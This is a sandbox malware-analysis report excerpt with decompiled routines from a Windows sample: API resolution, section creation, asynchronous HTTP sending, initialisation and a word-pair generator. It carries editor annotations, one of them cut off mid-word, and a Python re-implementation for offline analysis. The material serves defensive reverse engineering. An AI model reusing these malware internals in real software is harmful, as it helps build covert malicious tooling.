            											 *_a16 = _t56;        // success: the caller receives the context through _a16
            										}
            									}
            								}
            							}
            						}
            					}
            				}
            				return _v8;
            			}

            Instruction addresses for the decompiled lines above, in listing order (0x00000000 is the decompiler's placeholder for lines without an instruction of their own): 0x00401210, 0x00401214, 0x004012d5, 0x0040121a, 0x00401232, 0x00401241, 0x00401248, 0x0040124a, 0x0040124f, 0x004012cd, 0x004012ce, 0x00401251, 0x0040125e, 0x00401260, 0x00401265, 0x00000000, 0x00401267, 0x00401274, 0x00401276, 0x0040127b, 0x00000000, 0x0040127d, 0x0040128a, 0x0040128c, 0x00401291, 0x00000000, 0x00401293, 0x004012a0, 0x004012a2, 0x004012a7, 0x00000000, 0x004012a9, 0x004012af, 0x004012b5, 0x004012ba, 0x004012bf, 0x004012c4, 0x00000000, 0x004012c6, 0x004012c9, 0x004012c9, 0x004012c4, 0x004012a7, 0x00401291, 0x0040127b, 0x00401265, 0x0040124f, 0x004012e3

            APIs
              • Part of subcall function 004012E6: RtlAllocateHeap.NTDLL(00000000,?,00401A18,00000030,?,00000000), ref: 004012F2
            • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401337,?,?,?,?,?,00000002,?,?), ref: 00401226
            • GetProcAddress.KERNEL32(00000000,?), ref: 00401248
            • GetProcAddress.KERNEL32(00000000,?), ref: 0040125E
            • GetProcAddress.KERNEL32(00000000,?), ref: 00401274
            • GetProcAddress.KERNEL32(00000000,?), ref: 0040128A
            • GetProcAddress.KERNEL32(00000000,?), ref: 004012A0
              • Part of subcall function 0040110B: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74CB4EE0,00000000,00000000,?), ref: 00401168 (DesiredAccess 0x000F001F = SECTION_ALL_ACCESS, AllocationAttributes 0x08000000 = SEC_COMMIT, FileHandle 0 = pagefile-backed section)
              • Part of subcall function 0040110B: memset.NTDLL ref: 0040118A
            Memory Dump Source
            • Source File: 00000000.00000002.509472273.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.509472273.0000000000403000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.509472273.0000000000405000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.509472273.0000000000407000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
            • String ID:
            • API String ID: 3012371009-0
            • Opcode ID: ef3fb27e8fef4e2a0636531737cea3558674998f5155fbc55e035b1692bada1c
            • Instruction ID: f32f865edd81f5c961b11f374a2ae16c892bfa44bfba4a474c1bfb8eea8db87f
            • Opcode Fuzzy Hash: ef3fb27e8fef4e2a0636531737cea3558674998f5155fbc55e035b1692bada1c
            • Instruction Fuzzy Hash: 7C210CB4A0060BAFD710DFA9CD4495B77ECEB54314700447AEA09FB261EB74E9008B68
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E007E51D8(void* __eax, intOrPtr _a4, intOrPtr _a8) {
            				// Sends an already-prepared WinINet request. The object in __eax holds the
            				// request handle at +0x18 and two events at +0x1c/+0x20. The send is
            				// asynchronous: a FALSE return with ERROR_IO_PENDING (0x3e5) counts as success,
            				// since completion is signalled later through the events.
            				// The comments are the editor's annotations, not part of the Joe Sandbox listing.
            				void* __esi;
            				long _t10;
            				void* _t18;
            				void* _t22;
            
            				_t9 = __eax;
            				_t22 = __eax;
            				if(_a4 != 0 && E007E2058(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {   // optional string copied into the object (lstrlen/memcpy/lstrcpy, see APIs)
            					L9:
            					return GetLastError();
            				}
            				_t10 = E007E7B83(_t9, _t18, _t22, _a8); // executed
            				if(_t10 == 0) {
            					ResetEvent( *(_t22 + 0x1c));
            					ResetEvent( *(_t22 + 0x20));
            					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {   // hRequest, no extra headers, no optional body
            						SetEvent( *(_t22 + 0x1c));       // completed synchronously: signal at once
            						goto L7;
            					} else {
            						_t10 = GetLastError();
            						if(_t10 == 0x3e5) {            // ERROR_IO_PENDING: the send continues asynchronously
            							L7:
            							_t10 = 0;
            						}
            					}
            				}
            				if(_t10 == 0xffffffff) {             // -1 from the subcall means "consult GetLastError"
            					goto L9;
            				}
            				return _t10;
            			}

            Instruction addresses for the decompiled lines above, in listing order (0x00000000 is the decompiler's placeholder for lines without an instruction of their own): 0x007e51d8, 0x007e51e5, 0x007e51e7, 0x007e524a, 0x00000000, 0x007e524a, 0x007e51ff, 0x007e5206, 0x007e5212, 0x007e5217, 0x007e522d, 0x007e523d, 0x00000000, 0x007e522f, 0x007e522f, 0x007e5236, 0x007e5243, 0x007e5243, 0x007e5243, 0x007e5236, 0x007e522d, 0x007e5248, 0x00000000, 0x00000000, 0x007e524e

            APIs
            • ResetEvent.KERNEL32(?,00000008,?,?,00000102,007E21E7,?,?,74CF81D0,00000000), ref: 007E5212
            • ResetEvent.KERNEL32(?), ref: 007E5217
            • HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 007E5224
            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,007E3F34,00000000,?,?), ref: 007E522F
            • GetLastError.KERNEL32(?,?,00000102,007E21E7,?,?,74CF81D0,00000000), ref: 007E524A
              • Part of subcall function 007E2058: lstrlen.KERNEL32(00000000,00000008,?,74CB4D40,?,?,007E51F7,?,?,?,?,00000102,007E21E7,?,?,74CF81D0), ref: 007E2064
              • Part of subcall function 007E2058: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,007E51F7,?,?,?,?,00000102,007E21E7,?), ref: 007E20C2
              • Part of subcall function 007E2058: lstrcpy.KERNEL32(00000000,00000000), ref: 007E20D2
            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,007E3F34,00000000,?), ref: 007E523D
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
            • String ID:
            • API String ID: 3739416942-0
            • Opcode ID: d6e54678f705394328db5237a14eaa474080096e6df17110d404a762737cd1e0
            • Instruction ID: ba5d52c1bcba2764330716499302cf556c9211ea419e0e44ccd3a4f16672fd61
            • Opcode Fuzzy Hash: d6e54678f705394328db5237a14eaa474080096e6df17110d404a762737cd1e0
            • Instruction Fuzzy Hash: A501AD71102A85AADB306B32DC88F1B77A9BF5C328F104A28F691D10E0D728E804DA24
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 59%
            			E007E2523(signed int __edx) {
            				// Initialisation routine. It records OS-version flags in the global at 0x7ea2fc,
            				// initialises COM, picks a version-dependent SDDL string, builds a Mozilla-style
            				// User-Agent and allocates the global state block the other routines use.
            				// The comments decode the literal constants; they are the editor's annotations
            				// and not part of the Joe Sandbox listing.
            				signed int _v8;
            				long _v12;
            				CHAR* _v16;
            				long _v20;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				void* _t21;
            				CHAR* _t22;
            				CHAR* _t25;
            				intOrPtr _t26;
            				void* _t27;
            				void* _t31;
            				intOrPtr _t32;
            				void* _t33;
            				CHAR* _t37;
            				CHAR* _t43;
            				CHAR* _t44;
            				CHAR* _t45;
            				void* _t50;
            				void* _t52;
            				signed char _t57;
            				intOrPtr _t59;
            				signed int _t60;
            				void* _t64;
            				CHAR* _t68;
            				CHAR* _t69;
            				char* _t70;
            				void* _t71;
            
            				_t62 = __edx;
            				_v20 = 0;
            				_v8 = 0;
            				_v12 = 0;
            				_t21 = E007E4520();                        // GetModuleHandleA on a name that starts "NTDL" (see APIs)
            				if(_t21 != 0) {
            					_t60 =  *0x7ea2fc; // 0x2000000a          (low byte 0x0a: OS major version 10; top nibble: flags)
            					_t56 = (_t60 & 0xf0000000) + _t21;
            					 *0x7ea2fc = (_t60 & 0xf0000000) + _t21;
            				}
            				_t22 =  *0x7ea178(0, 2); // executed       -- arguments and return codes match CoInitializeEx(NULL, COINIT_APARTMENTTHREADED)
            				_v16 = _t22;
            				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {   // S_OK, S_FALSE (already initialised), RPC_E_CHANGED_MODE
            					_t25 = E007E3037( &_v8,  &_v20); // executed
            					_t55 = _t25;
            					_t26 =  *0x7ea348; // 0x272d5a8            (value added to every string-table offset)
            					if( *0x7ea2fc > 5) {                       // version byte above 5: Windows Vista and later
            						_t8 = _t26 + 0x7eb51d; // 0x4d283a53 == "S:(M": SDDL SACL with a mandatory-label (ML) ACE
            						_t27 = _t8;
            					} else {
            						_t7 = _t26 + 0x7eb9db; // 0x44283a44 == "D:(D": plain SDDL DACL for XP/2003, which have no integrity levels
            						_t27 = _t7;
            					}
            					E007E4332(_t27, _t27);                     // consumes the chosen security-descriptor string
            					_t31 = E007E415A(_t62,  &_v20,  &_v12); // executed
            					if(_t31 == 0) {
            						CloseHandle(_v20);
            					}
            					_t64 = 5;
            					if(_t55 != _t64) {                         // E007E3037 did not return 5 (ERROR_ACCESS_DENIED, if read as a Win32 code like the other results)
            						_t32 = E007E27A0();                    // GetVersionExA + wsprintfA (see APIs)
            						 *0x7ea310 =  *0x7ea310 ^ 0x81bbe65d;   // XOR-masks the 32-bit global at 0x7ea310
            						 *0x7ea36c = _t32;
            						_t33 = E007E33DC(0x60);                // RtlAllocateHeap(0x60): state block kept at 0x7ea3cc
            						 *0x7ea3cc = _t33;
            						__eflags = _t33;
            						if(_t33 == 0) {
            							_push(8);
            							_pop(0);                           // eax = 8, ERROR_NOT_ENOUGH_MEMORY
            						} else {
            							memset(_t33, 0, 0x60);
            							_t50 =  *0x7ea3cc; // 0x2f19600
            							_t71 = _t71 + 0xc;
            							__imp__(_t50 + 0x40);              // RtlInitializeCriticalSection(state + 0x40), see APIs
            							_t52 =  *0x7ea3cc; // 0x2f19600
            							 *_t52 = 0x7eb142;                 // first field points into the module's own image
            						}
            						_t55 = 0;
            						__eflags = 0;
            						if(0 == 0) {
            							_t37 = RtlAllocateHeap( *0x7ea2d8, 0, 0x43);   // 0x43-byte buffer for the User-Agent string, kept at 0x7ea368
            							 *0x7ea368 = _t37;
            							__eflags = _t37;
            							if(_t37 == 0) {
            								_push(8);
            								_pop(0);                       // ERROR_NOT_ENOUGH_MEMORY
            							} else {
            								_t57 =  *0x7ea2fc; // 0x2000000a
            								_t62 = _t57 & 0x000000ff;      // OS major version
            								_t59 =  *0x7ea348; // 0x272d5a8
            								_t13 = _t59 + 0x7eb74a; // 0x697a6f4d == "Mozi": start of a "Mozilla/..." format string
            								_t56 = _t13;
            								wsprintfA(_t37, _t13, _t57 & 0x000000ff, _t57 & 0x000000ff, 0x7e927b);   // browser-like User-Agent carrying the OS version (cf. "Uses a known web browser user agent")
            							}
            							_t55 = 0;
            							__eflags = 0;
            							if(0 == 0) {
            								asm("sbb eax, eax");
            								E007E3BD3( ~_v8 &  *0x7ea310, 0x7ea00c); // executed
            								_t43 = E007E1D8A(0, _t56, _t62, _t64, 0x7ea00c); // executed
            								_t55 = _t43;
            								__eflags = _t55;
            								if(_t55 != 0) {
            									goto L30;
            								}
            								_t44 = E007E6EA3(_t62); // executed
            								__eflags = _t44;
            								if(_t44 != 0) {
            									__eflags = _v8;
            									_t68 = _v12;
            									if(_v8 != 0) {
            										L29:
            										_t45 = E007E6815(_t62, _t68, _v8); // executed
            										_t55 = _t45;
            										goto L30;
            									}
            									__eflags = _t68;
            									if(__eflags == 0) {
            										goto L30;
            									}
            									_t55 = E007E5C31(__eflags,  &(_t68[4]));
            									__eflags = _t55;
            									if(_t55 == 0) {
            										goto L30;
            									}
            									goto L29;
            								}
            								_t55 = 8;                          // ERROR_NOT_ENOUGH_MEMORY
            							}
            						}
            					} else {
            						_t69 = _v12;
            						if(_t69 == 0) {
            							L30:
            							if(_v16 == 0 || _v16 == 1) {       // only undo a COM initialisation this routine performed
            								 *0x7ea17c();                   // consistent with CoUninitialize
            							}
            							goto L34;
            						}
            						_t70 =  &(_t69[4]);
            						do {
            						} while (E007E23C4(_t64, _t70, 0, 1) == 0x4c7);   // retry while ERROR_CANCELLED (1223)
            					}
            					goto L30;
            				} else {
            					_t55 = _t22;
            					L34:
            					return _t55;
            				}
            			}

            Instruction addresses for the decompiled lines above, in listing order (0x00000000 is the decompiler's placeholder for lines without an instruction of their own): 0x007e2523, 0x007e252d, 0x007e2530, 0x007e2533, 0x007e2536, 0x007e253d, 0x007e253f, 0x007e254b, 0x007e254d, 0x007e254d, 0x007e2556, 0x007e255c, 0x007e2561, 0x007e257b, 0x007e2587, 0x007e2589, 0x007e258e, 0x007e2598, 0x007e2598, 0x007e2590, 0x007e2590, 0x007e2590, 0x007e2590, 0x007e259f, 0x007e25ac, 0x007e25b3, 0x007e25b8, 0x007e25b8, 0x007e25c1, 0x007e25c4, 0x007e25ea, 0x007e25ef, 0x007e25fb, 0x007e2600, 0x007e2605, 0x007e260a, 0x007e260c, 0x007e2638, 0x007e263a, 0x007e260e, 0x007e2612, 0x007e2617, 0x007e261c, 0x007e2623, 0x007e2629, 0x007e262e, 0x007e2634, 0x007e263b, 0x007e263d, 0x007e263f, 0x007e264e, 0x007e2654, 0x007e2659, 0x007e265b, 0x007e268b, 0x007e268d, 0x007e265d, 0x007e265d, 0x007e2663, 0x007e2670, 0x007e2676, 0x007e2676, 0x007e267e, 0x007e2687, 0x007e268e, 0x007e2690, 0x007e2692, 0x007e2699, 0x007e26a6, 0x007e26ab, 0x007e26b0, 0x007e26b2, 0x007e26b4, 0x00000000, 0x00000000, 0x007e26b6, 0x007e26bb, 0x007e26bd, 0x007e26c4, 0x007e26c8, 0x007e26cb, 0x007e26e0, 0x007e26e4, 0x007e26e9, 0x00000000, 0x007e26e9, 0x007e26cd, 0x007e26cf, 0x00000000, 0x00000000, 0x007e26da, 0x007e26dc, 0x007e26de, 0x00000000, 0x00000000, 0x00000000, 0x007e26de, 0x007e26c1, 0x007e26c1, 0x007e2692, 0x007e25c6, 0x007e25c6, 0x007e25cb, 0x007e26eb, 0x007e26f0, 0x007e26f8, 0x007e26f8, 0x00000000, 0x007e26f0, 0x007e25d1, 0x007e25d4, 0x007e25de, 0x007e25e5, 0x00000000, 0x007e2700, 0x007e2700, 0x007e2703, 0x007e2707, 0x007e2707

            APIs
              • Part of subcall function 007E4520: GetModuleHandleA.KERNEL32(4C44544E,00000000,007E253B,00000001), ref: 007E452F (the first argument, 4C44544E, reads as the ASCII "NTDL" in little-endian order, i.e. the start of the module name)
            • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 007E25B8
              • Part of subcall function 007E27A0: GetVersionExA.KERNEL32(?,00000042,00000000), ref: 007E27C4
              • Part of subcall function 007E27A0: wsprintfA.USER32 ref: 007E2828
              • Part of subcall function 007E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,007E62F6), ref: 007E33E8
            • memset.NTDLL ref: 007E2612
            • RtlInitializeCriticalSection.NTDLL(02F195C0), ref: 007E2623
              • Part of subcall function 007E5C31: memset.NTDLL ref: 007E5C4B
              • Part of subcall function 007E5C31: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 007E5C91
              • Part of subcall function 007E5C31: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 007E5C9C
            • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 007E264E
            • wsprintfA.USER32 ref: 007E267E
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: AllocateHandleHeapmemsetwsprintf$CloseCriticalInitializeModuleSectionVersionlstrlen
            • String ID:
            • API String ID: 1825273115-0
            • Opcode ID: b73d71aa9abcc371e876bdbd60a462bd64b30fadfb6c701395c9860029788b50
            • Instruction ID: a8042a584fd200b7d637d89c3dc1cc2f40e089e99f82f2a762615fcef86b7958
            • Opcode Fuzzy Hash: b73d71aa9abcc371e876bdbd60a462bd64b30fadfb6c701395c9860029788b50
            • Instruction Fuzzy Hash: 5F511771A03295FBDB10ABA6DC89F6E37ACBB0C700F104556F202EB152D77DAA428B55
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 22%
            			E007E7040(signed int __eax, signed int _a4, signed int _a8) {
            				// __eax: PRNG seed; _a4: CR/LF-separated word list; _a8: its length in bytes.
            				// Pass 1 splits the list in place (separators become NUL, first letters are
            				// upper-cased) and records pointers to at most (_a8 >> 2) + 1 words. Pass 2
            				// draws two words per entry with a linear cong
            				// concatenations in a table published through the global at 0x7ea318.
            				// The comments are the editor's annotations, not part of the Joe Sandbox listing.
            				signed int _v8;
            				signed int _v12;
            				intOrPtr _v16;
            				signed int _v20;
            				intOrPtr _t81;
            				char _t83;
            				signed int _t90;
            				signed int _t97;
            				signed int _t99;
            				char _t101;
            				unsigned int _t102;
            				intOrPtr _t103;
            				char* _t107;
            				signed int _t110;
            				signed int _t113;
            				signed int _t118;
            				signed int _t122;
            				intOrPtr _t124;
            
            				_t102 = _a8;
            				_t118 = 0;                                  // length of the word being scanned
            				_v20 = __eax;                               // LCG state, seeded by the caller
            				_t122 = (_t102 >> 2) + 1;                   // capacity of the word-pointer array
            				_v8 = 0;                                    // longest word seen so far
            				_a8 = 0;                                    // number of words
            				_t81 = E007E33DC(_t122 << 2);               // RtlAllocateHeap for the pointer array (see APIs)
            				_v16 = _t81;
            				if(_t81 == 0) {
            					_push(8);
            					_pop(0);                                // eax = 8, ERROR_NOT_ENOUGH_MEMORY
            					L37:
            					return 0;
            				}
            				_t107 = _a4;
            				_a4 = _t102;                                // bytes remaining
            				_t113 = 0;                                  // next free slot in the pointer array
            				while(1) {
            					_t83 =  *_t107;
            					if(_t83 == 0) {
            						break;
            					}
            					if(_t83 == 0xd || _t83 == 0xa) {        // CR or LF ends a word
            						if(_t118 != 0) {
            							if(_t118 > _v8) {
            								_v8 = _t118;
            							}
            							_a8 = _a8 + 1;
            							_t118 = 0;
            						}
            						 *_t107 = 0;                         // NUL-terminate in place
            						goto L16;
            					} else {
            						if(_t118 != 0) {
            							L10:
            							_t118 = _t118 + 1;
            							L16:
            							_t107 = _t107 + 1;
            							_t15 =  &_a4;
            							 *_t15 = _a4 - 1;
            							if( *_t15 != 0) {
            								continue;
            							}
            							break;
            						}
            						if(_t113 == _t122) {                // pointer array full: stop scanning
            							L21:
            							if(_a8 <= 0x20) {                // 32 words or fewer: list rejected
            								_push(0xb);                  // eax = 0xb, ERROR_BAD_FORMAT
            								L34:
            								_pop(0);
            								L35:
            								E007E61DA(_v16);             // RtlFreeHeap(pointer array)
            								goto L37;
            							}
            							_t24 = _v8 + 5; // 0xcdd8d2f8
            							_t103 = E007E33DC((_v8 + _t24) * _a8 + 4);   // (2 * longest + 5) bytes per entry: a pointer slot plus two words and a NUL
            							if(_t103 == 0) {
            								_push(8);
            								goto L34;
            							}
            							_t90 = _a8;
            							_a4 = _a4 & 0x00000000;          // entries stored so far
            							_v8 = _v8 & 0x00000000;          // loop counter
            							_t124 = _t103 + _t90 * 4;        // string storage starts after the pointer slots
            							if(_t90 <= 0) {
            								L31:
            								 *0x7ea318 = _t103;
            								goto L35;
            							}
            							do {
            								_t110 = 0x3c6ef35f + _v20 * 0x19660d;   // LCG step (x * 0x19660D + 0x3C6EF35F, the "Numerical Recipes" constants): left word
            								_v20 = 0x3c6ef35f + _t110 * 0x19660d;   // second step: right word, and the state for the next entry
            								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));   // lstrcpy(out, words[r1 % count])
            								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));    // lstrcat(out, words[r2 % count])
            								_v12 = _v12 & 0x00000000;
            								if(_a4 <= 0) {
            									goto L30;
            								} else {
            									goto L26;
            								}
            								while(1) {
            									L26:
            									_t99 = _v12;
            									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed   -- lstrcmp against each entry stored so far
            									if(_t99 == 0) {                  // the test is on the lstrcmp result (a duplicate was found); the decompiler reused _t99 for it
            										break;
            									}
            									_v12 = _v12 + 1;
            									if(_v12 < _a4) {
            										continue;
            									}
            									goto L30;
            								}
            								_v8 = _v8 - 1;                       // duplicate path; what follows is not reliably recovered (quality 22%)
            								L30:
            								_t97 = _a4;
            								_a4 = _a4 + 1;
            								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;   // publish the entry
            								__imp__(_t124);                      // lstrlen(out)
            								_v8 = _v8 + 1;
            								_t124 = _t124 + _t97 + 1;            // advance past the string; the buffer sizing implies the lstrlen result is added here, which the decompiler shows as _t97
            							} while (_v8 < _a8);
            							goto L31;
            						}
            						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;   // record the start of a new word
            						_t101 = _t83;
            						if(_t83 - 0x61 <= 0x19) {            // 'a'..'z'
            							_t101 = _t101 - 0x20;               // upper-case the first letter
            						}
            						 *_t107 = _t101;
            						_t113 = _t113 + 1;
            						goto L10;
            					}
            				}
            				if(_t118 != 0) {                            // last word without a trailing separator
            					if(_t118 > _v8) {
            						_v8 = _t118;
            					}
            					_a8 = _a8 + 1;
            				}
            				goto L21;
            			}
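            The routine above is small enough to reproduce: it splits a CR/LF-separated word list in place, upper-cases the first letter of each word, rejects lists of 32 words or fewer (error 0xb), and then fills a table with one concatenated word pair per word, choosing the two words with the 32-bit LCG x' = x * 0x19660D + 0x3C6EF35F (two draws per entry, the second carried forward as the next state). The Python below is an example added by the editor, not code from the Joe Sandbox report or from the sample; it re-implements that logic so an analyst who has recovered the word list and the seed from memory can regenerate the table offline. The function names, the constructed 33-word list, and two behaviours the decompile does not pin down (what happens to a duplicate pair, here a re-roll, and unsigned rather than signed modulo when indexing) are the editor's assumptions.

```python
# Added example (editor's code, not from the report or the sample): Python
# re-implementation of the word-pair generator decompiled as E007E7040.
from typing import List

LCG_A = 0x19660D           # multiplier in E007E7040:  x * 0x19660d
LCG_C = 0x3C6EF35F         # increment:               + 0x3c6ef35f  (the "Numerical Recipes" LCG)
MASK32 = 0xFFFFFFFF
MIN_WORDS = 0x20           # the sample rejects a list with count <= 0x20 ...
ERROR_BAD_FORMAT = 0xB     # ... and returns error 0xb (ERROR_BAD_FORMAT)


def lcg_next(state: int) -> int:
    """One 32-bit LCG step, x' = (x * 0x19660D + 0x3C6EF35F) mod 2**32."""
    return (state * LCG_A + LCG_C) & MASK32


def parse_wordlist(buf: bytes) -> List[str]:
    """Split the list the way the first loop of E007E7040 does.

    CR and LF end a word, every other byte is part of it, a NUL byte ends the
    input, at most (len >> 2) + 1 words are recorded, and the first byte of a
    word is upper-cased when it is in 'a'..'z' (the "- 0x20" in the decompile).
    """
    max_words = (len(buf) >> 2) + 1
    words: List[str] = []
    current = bytearray()
    for b in buf:
        if b == 0:
            break
        if b in (0x0D, 0x0A):
            if current:
                words.append(current.decode("latin-1"))
                current = bytearray()
            continue
        if not current:                      # first byte of a new word
            if len(words) == max_words:      # pointer array full: the sample stops here
                return words
            if 0x61 <= b <= 0x7A:
                b -= 0x20
        current.append(b)
    if current:
        words.append(current.decode("latin-1"))
    return words


def wordlist_is_usable(words: List[str]) -> bool:
    """E007E7040 needs more than 0x20 words; fewer fail with ERROR_BAD_FORMAT."""
    return len(words) > MIN_WORDS


def generate_pairs(seed: int, wordlist: bytes) -> List[str]:
    """Second loop of E007E7040: one concatenated pair per word in the list.

    Each pair takes two LCG draws; the first selects the left word, the second
    selects the right word and becomes the state for the next pair. Candidates
    are compared against everything stored so far (lstrcmp in the sample); the
    decompile does not show what a hit does, so this version re-rolls
    (assumption). Indices use the unsigned 32-bit value modulo the word count
    (assumption).
    """
    words = parse_wordlist(wordlist)
    if not wordlist_is_usable(words):
        raise ValueError(
            f"{len(words)} words; the sample would fail with {ERROR_BAD_FORMAT:#x}")
    n = len(words)
    state = seed & MASK32
    pairs: List[str] = []
    rerolls = 0
    while len(pairs) < n:
        first = lcg_next(state)          # _t110 in the decompile
        state = lcg_next(first)          # _v20, carried into the next iteration
        candidate = words[first % n] + words[state % n]
        if candidate in pairs:
            rerolls += 1
            if rerolls > 64 * n:
                raise RuntimeError("word list too small to fill the table with unique pairs")
            continue
        pairs.append(candidate)
    return pairs


# Constructed sample input (not taken from the report): 33 words, the smallest
# list the sample accepts, CR LF separated as the in-place parser expects.
SAMPLE_WORDS = [
    "alpha", "bravo", "charlie", "delta", "echo", "foxtrot", "golf", "hotel",
    "india", "juliet", "kilo", "lima", "mike", "november", "oscar", "papa",
    "quebec", "romeo", "sierra", "tango", "uniform", "victor", "whiskey",
    "xray", "yankee", "zulu", "apple", "banana", "cherry", "dates", "elder",
    "figs", "grape",
]
SAMPLE_WORDLIST = b"\r\n".join(w.encode() for w in SAMPLE_WORDS) + b"\r\n"

if __name__ == "__main__":
    # Seed 0 yields "NovemberFoxtrot" first: 0x3C6EF35F % 33 == 13, 1196435762 % 33 == 5.
    for i, pair in enumerate(generate_pairs(0, SAMPLE_WORDLIST)):
        print(f"{i:2d} {pair}")
```

            Run as a script it prints the 33 pairs derived from seed 0; point parse_wordlist at a list carved from a memory dump and pass the recovered seed to regenerate the table the sample keeps at 0x7ea318. The 32-word threshold is worth keeping in the tool, since a truncated list is the easiest way to confuse the result with a parsing bug.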

            Instruction addresses for the decompiled lines above, in listing order (0x00000000 is the decompiler's placeholder for lines without an instruction of their own): 0x007e7047, 0x007e704e, 0x007e7053, 0x007e7056, 0x007e705d, 0x007e7060, 0x007e7063, 0x007e7068, 0x007e706d, 0x007e71c1, 0x007e71c3, 0x007e71c5, 0x007e71ca, 0x007e71ca, 0x007e7073, 0x007e7076, 0x007e7079, 0x007e707b, 0x007e707b, 0x007e707f, 0x00000000, 0x00000000, 0x007e7083, 0x007e70af, 0x007e70b4, 0x007e70b6, 0x007e70b6, 0x007e70b9, 0x007e70bc, 0x007e70bc, 0x007e70be, 0x00000000, 0x007e7089, 0x007e708b, 0x007e70aa, 0x007e70aa, 0x007e70c1, 0x007e70c1, 0x007e70c2, 0x007e70c2, 0x007e70c5, 0x00000000, 0x00000000, 0x00000000, 0x007e70c5, 0x007e708f, 0x007e70d6, 0x007e70da, 0x007e71b4, 0x007e71b6, 0x007e71b6, 0x007e71b7, 0x007e71ba, 0x00000000, 0x007e71ba, 0x007e70e3, 0x007e70f4, 0x007e70f8, 0x007e71b0, 0x00000000, 0x007e71b0, 0x007e70fe, 0x007e7101, 0x007e7105, 0x007e7109, 0x007e710e, 0x007e71a6, 0x007e71a6, 0x00000000, 0x007e71ac, 0x007e7119, 0x007e7122, 0x007e7136, 0x007e713d, 0x007e7152, 0x007e7158, 0x007e7160, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x007e7162, 0x007e7162, 0x007e7162, 0x007e7169, 0x007e7171, 0x00000000, 0x00000000, 0x007e7173, 0x007e717c, 0x00000000, 0x00000000, 0x00000000, 0x007e717e, 0x007e7180, 0x007e7183, 0x007e7183, 0x007e7186, 0x007e718a, 0x007e718d, 0x007e7193, 0x007e7196, 0x007e719d, 0x00000000, 0x007e7119, 0x007e7094, 0x007e709c, 0x007e70a2, 0x007e70a4, 0x007e70a4, 0x007e70a7, 0x007e70a9, 0x00000000, 0x007e70a9, 0x007e7083, 0x007e70c9, 0x007e70ce, 0x007e70d0, 0x007e70d0, 0x007e70d3, 0x007e70d3, 0x00000000

            APIs
              • Part of subcall function 007E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,007E62F6), ref: 007E33E8
            • lstrcpy.KERNEL32(43175AC4,00000020), ref: 007E713D
            • lstrcat.KERNEL32(43175AC4,00000020), ref: 007E7152
            • lstrcmp.KERNEL32(00000000,43175AC4), ref: 007E7169
            • lstrlen.KERNEL32(43175AC4), ref: 007E718D
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
            • String ID:
            • API String ID: 3214092121-3916222277
